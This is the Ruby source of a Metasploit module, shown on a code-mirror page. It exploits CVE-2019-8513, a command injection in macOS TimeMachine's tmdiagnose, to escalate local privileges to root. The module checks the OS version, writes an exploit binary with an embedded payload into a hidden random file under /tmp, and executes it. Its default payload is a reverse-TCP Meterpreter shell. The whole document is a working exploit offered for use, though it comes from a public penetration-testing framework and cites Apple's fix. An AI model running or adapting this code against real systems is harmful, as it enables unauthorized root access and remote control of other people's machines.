Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/local/timemachine_cmd_injection.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::OSX::Priv

11
  include Msf::Post::OSX::System

12
  include Msf::Exploit::EXE

13
  include Msf::Exploit::FileDropper

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Mac OS X TimeMachine (tmdiagnose) Command Injection Privilege Escalation',

20
        'Description' => %q{

21
          This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in

22
          order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers

23
          from a command injection vulnerability that can be exploited by creating a

24
          specially crafted disk label.

25


26
          The tmdiagnose binary uses awk to list every mounted volume, and composes

27
          shell commands based on the volume labels. By creating a volume label with the

28
          backtick character, we can have our own binary executed with root priviledges.

29
        },

30
        'License' => MSF_LICENSE,

31
        'Author' => [

32
          'CodeColorist', # Discovery and exploit

33
          'timwr', # Metasploit module

34
        ],

35
        'References' => [

36
          ['CVE', '2019-8513'],

37
          ['URL', 'http://web.archive.org/web/20201113192302/https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43'],

38
          ['URL', 'https://support.apple.com/en-in/HT209600'],

39
          ['URL', 'https://github.com/ChiChou/sploits'],

40
        ],

41
        'DefaultTarget' => 0,

42
        'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },

43
        'Targets' => [

44
          [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],

45
          [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],

46
          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],

47
        ],

48
        'DisclosureDate' => '2019-04-13',

49
        'Notes' => {

50
          'Reliability' => UNKNOWN_RELIABILITY,

51
          'Stability' => UNKNOWN_STABILITY,

52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

53
        }

54
      )

55
    )

56
    register_advanced_options [

57
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])

58
    ]

59
  end

60


61
  def upload_executable_file(filepath, filedata)

62
    print_status("Uploading file: '#{filepath}'")

63
    write_file(filepath, filedata)

64
    chmod(filepath)

65
    register_file_for_cleanup(filepath)

66
  end

67


68
  def check

69
    version = Rex::Version.new(get_system_version)

70
    if version >= Rex::Version.new('10.14.4')

71
      CheckCode::Safe

72
    else

73
      CheckCode::Appears

74
    end

75
  end

76


77
  def exploit

78
    if check != CheckCode::Appears

79
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'

80
    end

81


82
    if is_root?

83
      fail_with Failure::BadConfig, 'Session already has root privileges'

84
    end

85


86
    unless writable? datastore['WritableDir']

87
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"

88
    end

89


90
    exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8513", "exploit"))

91
    if target['Arch'] == ARCH_X64

92
      root_cmd = payload.encoded

93
    else

94
      root_cmd = payload.raw

95
      if target['Arch'] == ARCH_PYTHON

96
        root_cmd = "echo \"#{root_cmd}\" | python"

97
      end

98
      root_cmd = "CMD:#{root_cmd}"

99
    end

100
    if root_cmd.length > 1024

101
      fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"

102
    end

103


104
    placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')

105
    exploit_data[placeholder_index, root_cmd.length] = root_cmd

106


107
    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"

108
    upload_executable_file(exploit_file, exploit_data)

109


110
    print_status("Executing exploit '#{exploit_file}'")

111
    result = cmd_exec(exploit_file)

112
    print_status("Exploit result:\n#{result}")

113
  end

114
end

115


116